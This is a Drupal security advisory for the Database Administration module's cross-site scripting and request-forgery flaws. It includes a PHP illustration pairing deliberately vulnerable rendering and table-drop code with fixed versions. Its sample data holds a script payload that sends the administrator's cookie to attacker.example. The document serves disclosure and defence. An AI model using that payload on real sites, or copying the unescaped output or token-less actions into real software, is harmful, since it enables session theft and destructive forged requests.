• Advisory ID: DRUPAL-SA-2007-013.
  • Project: Database Administration (third-party module).
  • Version: 4.6.x-1.*, 4.7.x-1.*.
  • Date: 2007-April-11.
  • Security risk: Critical.
  • Exploitable from: Remote.
  • Vulnerability: Cross site scripting and cross site request forgery.

Description

The Database Administration (dba) module allows site administrators with sufficient privileges to view and directly modify the Drupal database tables for a site. Numerous cross-site scripting (XSS) vulnerabilities were discovered in the display of query results and in other parts of the user interface: values read from the database are written into the page without being escaped, so content that a less privileged user can store in the database (a node title, a username, a log message) can carry script that runs in the administrator's browser as soon as the administrator displays that table. Learn more about XSS on Wikipedia.

Additionally, the module was never fully ported to the Drupal Form API, so some of its actions are still triggered by requests that carry no form token and can therefore be forged by a third-party page visited by a logged-in administrator (cross-site request forgery, CSRF). See DRUPAL-SA-2006-025 for more information.
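The two bug classes above, as an added illustration that is not code from the dba module or from Drupal: a query-result renderer that writes database values into HTML unescaped next to one that escapes them, and a table-drop action reachable by a plain link next to one that requires a per-session token. check_plain_standin() and token_standin() are assumed stand-ins for Drupal's check_plain() and the Form API's form token so the file runs without a Drupal site; the sample rows, table names, session id and key are constructed.

```php
<?php
// Illustration for this advisory, not the dba module's code. Shows
//   1. query results written into HTML unescaped (stored XSS), and
//   2. a destructive action accepted without a request token (CSRF),
// each beside a hardened form.

// Stand-in for Drupal's check_plain(): escape for an HTML text context.
// Assumes a UTF-8 site charset.
function check_plain_standin($text) {
  return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// Constructed rows standing in for db_fetch_array() results. The second
// row holds a payload that any user able to write to the database could
// plant, then wait for an administrator to display the table.
function sample_rows() {
  return array(
    array('nid' => 1, 'title' => 'Hello world'),
    array('nid' => 2, 'title' => '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'),
  );
}

// XSS, vulnerable: each cell value lands in the page as markup.
function render_rows_vulnerable(array $rows) {
  $out = '<table>';
  foreach ($rows as $row) {
    $out .= '<tr>';
    foreach ($row as $cell) {
      $out .= '<td>' . $cell . '</td>';
    }
    $out .= '</tr>';
  }
  return $out . '</table>';
}

// XSS, fixed: every value is escaped on output, so the browser shows the
// payload as text instead of executing it.
function render_rows_fixed(array $rows) {
  $out = '<table>';
  foreach ($rows as $row) {
    $out .= '<tr>';
    foreach ($row as $cell) {
      $out .= '<td>' . check_plain_standin($cell) . '</td>';
    }
    $out .= '</tr>';
  }
  return $out . '</table>';
}

// CSRF, vulnerable: a plain link such as ?op=drop&table=users performs the
// action. The attacker only needs the administrator's browser to fetch
// that URL, e.g. through <img src="..."> on any page the admin visits.
function handle_drop_vulnerable(array $get, array $allowed_tables) {
  if (isset($get['op'], $get['table']) && $get['op'] === 'drop'
      && in_array($get['table'], $allowed_tables, TRUE)) {
    return 'DROP TABLE ' . $get['table'];   // what the module would run
  }
  return FALSE;
}

// Stand-in for the Form API's form token: bound to the session and to a
// per-site secret, so a third-party page cannot compute it.
function token_standin($value, $session_id, $private_key) {
  return hash_hmac('sha256', $session_id . '|' . $value, $private_key);
}

// CSRF, fixed: the action runs only when the request carries a token
// minted for this session and this exact action. The Form API adds such a
// token to every form; the advisory's bug is that parts of the module
// bypassed the Form API.
function handle_drop_fixed(array $post, array $allowed_tables, $session_id, $private_key) {
  if (!isset($post['op'], $post['table'], $post['token'])
      || $post['op'] !== 'drop'
      || !in_array($post['table'], $allowed_tables, TRUE)) {
    return FALSE;
  }
  $expected = token_standin('drop:' . $post['table'], $session_id, $private_key);
  if (!hash_equals($expected, (string) $post['token'])) {
    return FALSE;   // forged or replayed request: do nothing
  }
  return 'DROP TABLE ' . $post['table'];
}

// Demonstration.
$rows = sample_rows();
echo render_rows_vulnerable($rows), "\n";   // <script> reaches the browser
echo render_rows_fixed($rows), "\n";        // payload rendered as text

$allowed = array('users', 'node');
$session = 'admin-session-id';              // constructed value
$key     = 'per-site-private-key';          // constructed value
// Cross-site GET with no token: the vulnerable handler performs the drop.
var_dump(handle_drop_vulnerable(array('op' => 'drop', 'table' => 'users'), $allowed));
// Same request with a guessed token: the fixed handler refuses.
var_dump(handle_drop_fixed(array('op' => 'drop', 'table' => 'users', 'token' => 'guess'), $allowed, $session, $key));
// Legitimate submission carrying the session's own token: accepted.
$good = token_standin('drop:users', $session, $key);
var_dump(handle_drop_fixed(array('op' => 'drop', 'table' => 'users', 'token' => $good), $allowed, $session, $key));
```

Run with `php` on the command line; hash_equals() needs PHP 5.6 or later. The escaping has to happen at output time, not when the value is stored: the module displays arbitrary tables, so it cannot rely on whatever code wrote the row having sanitised it.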

Disabling the Database administration module provides an immediate workaround.

Versions affected

  • Database administration (dba) 4.7.x-1.* before version 4.7.x-1.2.
  • All versions of dba.module 4.6.x-*.

Drupal core is not affected. If you do not use the contributed Database administration module, there is nothing you need to do.

Solution

  • If your site is running 4.7.x, install the latest version: Database administration 4.7.x-1.2.
  • If your site is running 4.6.x, you should disable the dba.module. The 4.6.x branch is no longer supported and all released 4.6.x versions of the module are insecure.

Reported by:

  • XSS by Derek Wright (dww) of the Drupal Security Team.
  • CSRF by Heine Deelstra (Heine) of the Drupal Security Team.

Contact

The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.